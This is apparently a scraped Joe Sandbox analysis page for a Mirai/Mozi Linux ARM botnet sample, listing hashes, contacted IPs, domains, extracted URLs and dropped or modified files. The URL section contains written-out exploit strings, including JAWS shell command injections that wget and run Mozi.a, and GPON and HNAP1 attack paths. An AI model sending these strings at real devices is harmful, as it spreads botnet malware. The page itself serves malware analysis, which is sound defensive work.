i

Status: finished

Submission Time: 2021-01-06 19:30:37 +01:00

Malicious

Spreader

Trojan

Evader

Mirai

Comments

Details

Analysis ID:
336769
API (Web) ID:
575427
Analysis Started:

2021-01-06 19:30:38 +01:00
Analysis Finished:

2021-01-06 19:39:54 +01:00
MD5:
eec5c6c219535fba3a0492ea8118b397
SHA1:
292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256:
12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
Technologies:

Engines
IOCs

Joe Sandbox

Engine	Download Report	Detection	Info
	Full Report Management Report IOC Report	malicious Score: 100	System: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)

Third Party Analysis Engines

Open Full Report

malicious

Score: 40/62

malicious

Score: 20/29

malicious

IPs

IP	Country	Detection
185.70.34.103	United Kingdom
148.162.250.199	United States
170.30.9.222	United States
Click to see the 97 hidden entries
31.239.241.25	Germany
45.18.240.57	United States
49.101.60.201	Japan
5.207.217.166	Ukraine
193.1.110.180	Ireland
208.117.118.156	United States
123.181.239.244	China
163.11.57.89	United States
100.24.197.89	United States
214.148.23.237	United States
114.142.138.74	India
18.144.253.3	United States
63.224.11.107	United States
46.237.138.113	United Kingdom
201.20.84.101	Brazil
30.34.164.197	United States
137.177.179.233	United States
181.170.3.37	Argentina
46.91.81.50	Germany
18.172.254.74	United States
176.51.203.237	Russian Federation
22.169.86.166	United States
199.86.216.179	United States
182.39.215.123	China
16.250.227.156	United States
205.21.247.67	United States
172.254.93.35	United States
130.94.25.120	United States
91.166.162.40	France
118.61.155.193	Korea Republic of
13.8.174.247	United States
180.130.76.228	China
28.213.170.69	United States
214.89.182.196	United States
54.193.94.223	United States
167.108.60.4	Uruguay
195.13.205.115	Latvia
148.233.132.212	Mexico
163.81.198.169	France
67.19.147.226	United States
166.95.72.65	United States
174.64.181.99	United States
17.120.249.110	United States
117.202.65.25	India
46.72.244.174	Russian Federation
126.3.151.91	Japan
87.179.7.128	Germany
173.151.118.105	United States
202.33.171.73	Japan
188.244.183.222	Russian Federation
146.5.204.214	United States
29.78.6.226	United States
145.223.153.219	Netherlands
20.137.220.37	United States
108.218.216.192	United States
138.177.58.109	United States
64.57.12.117	United States
139.183.125.68	China
85.71.193.222	Czech Republic
42.89.43.188	China
166.215.169.118	United States
20.13.123.136	United States
11.32.2.138	United States
212.170.239.6	Spain
130.49.72.137	United States
152.107.5.68	South Africa
115.41.126.154	Korea Republic of
166.179.32.229	United States
33.226.164.157	United States
1.223.141.144	Korea Republic of
157.88.175.0	Spain
73.112.48.171	United States
156.130.158.103	United States
121.225.157.134	China
35.133.83.246	United States
119.157.148.99	Pakistan
133.167.102.52	Japan
23.68.17.106	United States
15.16.85.120	United States
146.193.54.100	Portugal
115.23.113.40	Korea Republic of
131.252.63.108	United States
9.10.22.243	United States
28.173.173.36	United States
179.204.129.228	Brazil
208.237.78.155	United States
34.196.39.11	United States
197.144.154.30	Morocco
65.73.82.146	United States
120.187.198.153	Indonesia
200.147.110.20	Brazil
141.26.145.32	Germany
114.53.240.254	Korea Republic of
60.6.50.171	China
125.92.238.56	China
46.68.162.239	United Kingdom
26.100.71.227	United States

Domains

Name	IP	Detection
dht.transmissionbt.com	212.129.33.59
bttracker.acc.umu.se	130.239.18.159
router.bittorrent.com	67.215.246.10
Click to see the 2 hidden entries
router.utorrent.com	82.221.103.244
bttracker.debian.org	0.0.0.0

URLs

Name	Detection
http://%s:%d/Mozi.m;
http://%s:%d/Mozi.m;/tmp/Mozi.m
http://23.214.76.71:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
Click to see the 40 hidden entries
http://23.210.67.167:80/HNAP1/
http://92.246.94.253:80/HNAP1/
http://%s:%d/bin.sh
http://139.162.182.70:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://81.6.188.111:80/HNAP1/
http://139.39.140.28:49152/soap.cgi?service=WANIPConn1
http://103.47.16.235:80/HNAP1/
http://85.214.105.212:80/HNAP1/
http://www.alsa-project.org/cardinfo-db/
http://%s:%d/Mozi.m
http://www.alsa-project.org/alsa-info.sh
http://%s:%d/bin.sh;chmod
http://%s:%d/Mozi.a;chmod
http://%s:%d/Mozi.a;sh$
http://71.41.225.74:80/HNAP1/
http://13.249.130.85:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://178.88.225.33:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://127.0.0.1:80/GponForm/diag_Form?images/
http://pastebin.ca)
http://167.82.102.91:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://%s:%d/Mozi.m;$
http://127.0.0.1:8080/GponForm/diag_Form?images/
http://www.pastebin.ca
http://www.pastebin.ca.
http://www.alsa-project.org.
http://purenetworks.com/HNAP1/
http://HTTP/1.1
http://schemas.xmlsoap.org/soap/envelope//
http://ipinfo.io/ip
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
http://127.0.0.1sendcmd
http://www.pastebin.ca/upload.php
http://www.alsa-project.org
http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
http://127.0.0.1
http://schemas.xmlsoap.org/soap/envelope/
http://127.0.0.1:7574/UD/act?1
http://schemas.xmlsoap.org/soap/encoding/

Dropped files

Name	File Type	Hashes
/usr/share/doc/git/contrib/examples/git-fetch.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-revert.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-resolve.sh	ASCII text	#
Click to see the 97 hidden entries
/usr/share/doc/git/contrib/examples/git-reset.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-repack.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-pull.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-notes.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-merge.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-merge-ours.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-ls-remote.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-log.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-gc.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-tag.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-commit.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-clone.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-clean.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-checkout.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-am.sh	OS/2 REXX batch file, ASCII text	#
/usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh	ASCII text	#
/usr/share/doc/gdb/contrib/gdb-add-index.sh	ASCII text	#
/usr/share/doc/gdb/contrib/expect-read1.sh	ASCII text	#
/usr/share/doc/gdb/contrib/ari/gdb_find.sh	ASCII text	#
/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh	ASCII text	#
/usr/share/doc/gawk/examples/prog/igawk.sh	awk or perl script, ASCII text	#
/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh	ASCII text	#
/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh	ASCII text	#
/usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh	ASCII text	#
/usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh	ASCII text	#
/usr/share/doc/tmux/examples/bash_completion_tmux.sh	ASCII text	#
/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh	ASCII text	#
/usr/share/doc/netcat-openbsd/examples/dist.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/ping-places.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/pcmcia-compat.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/get-mac-address.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/check-mac-address.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/hddtemp-all.sh	ASCII text	#
/etc/acpi/asus-keyboard-backlight.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh	ASCII text	#
/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh	ASCII text	#
/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh	ASCII text	#
/usr/share/doc/git/contrib/subtree/git-subtree.sh	ASCII text	#
/usr/share/doc/git/contrib/rerere-train.sh	ASCII text	#
/usr/share/doc/git/contrib/remotes2config.sh	ASCII text	#
/usr/share/doc/git/contrib/git-resurrect.sh	ASCII text	#
/usr/share/doc/git/contrib/fast-import/git-import.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-whatchanged.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-verify-tag.sh	ASCII text	#
/etc/init.d/hostname.sh	ASCII text	#
/etc/profile.d/bash_completion.sh	ASCII text	#
/etc/profile.d/apps-bin-path.sh	ASCII text	#
/etc/profile.d/Z97-byobu.sh	ASCII text	#
/etc/init.d/umountnfs.sh	ASCII text	#
/etc/init.d/mountnfs.sh	ASCII text	#
/etc/init.d/mountnfs-bootclean.sh	ASCII text	#
/etc/init.d/mountkernfs.sh	ASCII text	#
/etc/init.d/mountdevsubfs.sh	ASCII text	#
/etc/init.d/mountall.sh	ASCII text	#
/etc/init.d/mountall-bootclean.sh	ASCII text	#
/etc/init.d/hwclock.sh	ASCII text	#
/etc/profile.d/cedilla-portuguese.sh	ASCII text	#
/etc/init.d/checkroot.sh	ASCII text	#
/etc/init.d/checkroot-bootclean.sh	ASCII text	#
/etc/init.d/checkfs.sh	ASCII text	#
/etc/init.d/bootmisc.sh	ASCII text	#
/etc/init.d/S95baby.sh	POSIX shell script, ASCII text executable	#
/etc/bash_completion.d/libreoffice.sh	ASCII text	#
/etc/acpi/asus-wireless.sh	ASCII text	#
/etc/acpi/ibm-wireless.sh	ASCII text	#
/etc/acpi/powerbtn.sh	ASCII text	#
/etc/acpi/tosh-wireless.sh	ASCII text	#
/etc/acpi/undock.sh	ASCII text	#
/usr/share/alsa-base/alsa-info.sh	ASCII text, with very long lines	#
/usr/share/doc/cron/examples/cron-tasks-review.sh	ASCII text	#
/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh	ASCII text	#
/usr/share/doc/acpid/examples/default.sh	ASCII text	#
/usr/share/doc/acpid/examples/ac.sh	ASCII text	#
/boot/grub/i386-pc/modinfo.sh	ASCII text	#
/usr/share/cups/braille/indexv4.sh	ASCII text	#
/usr/share/cups/braille/indexv3.sh	ASCII text	#
/usr/share/cups/braille/index.sh	ASCII text	#
/usr/share/cups/braille/cups-braille.sh	UTF-8 Unicode text	#
/usr/share/brltty/initramfs/brltty.sh	ASCII text	#
/usr/share/alsa/utils.sh	ASCII text	#
/usr/sbin/alsa-info.sh	ASCII text, with very long lines	#
/usr/networks	ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped	#
/usr/bin/gettext.sh	ASCII text	#
/tmp/.config	ASCII text	#
/etc/wpa_supplicant/ifupdown.sh	ASCII text	#
/etc/wpa_supplicant/functions.sh	ASCII text	#
/etc/wpa_supplicant/action_wpa.sh	ASCII text	#
/etc/rcS.d/S95baby.sh	POSIX shell script, ASCII text executable	#
/etc/rc.local	ASCII text	#
/etc/profile.d/vte-2.91.sh	ASCII text	#
/usr/share/doc/xdotool/examples/ffsp.sh	ASCII text	#
/usr/share/doc/mdadm/examples/mdadd.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/daemon/healthd.sh	ASCII text	#
/usr/share/debconf/confmodule.sh	ASCII text	#
/usr/share/doc/gawk/examples/network/PostAgent.sh	ASCII text	#

i

Comments

Tags

Available tags:

Details

Joe Sandbox

Third Party Analysis Engines

IPs

Domains

URLs

Dropped files

i Options

Comments

Tags

Available tags:

Details

Joe Sandbox

Third Party Analysis Engines

IPs

Domains

URLs

Dropped files

Search started

i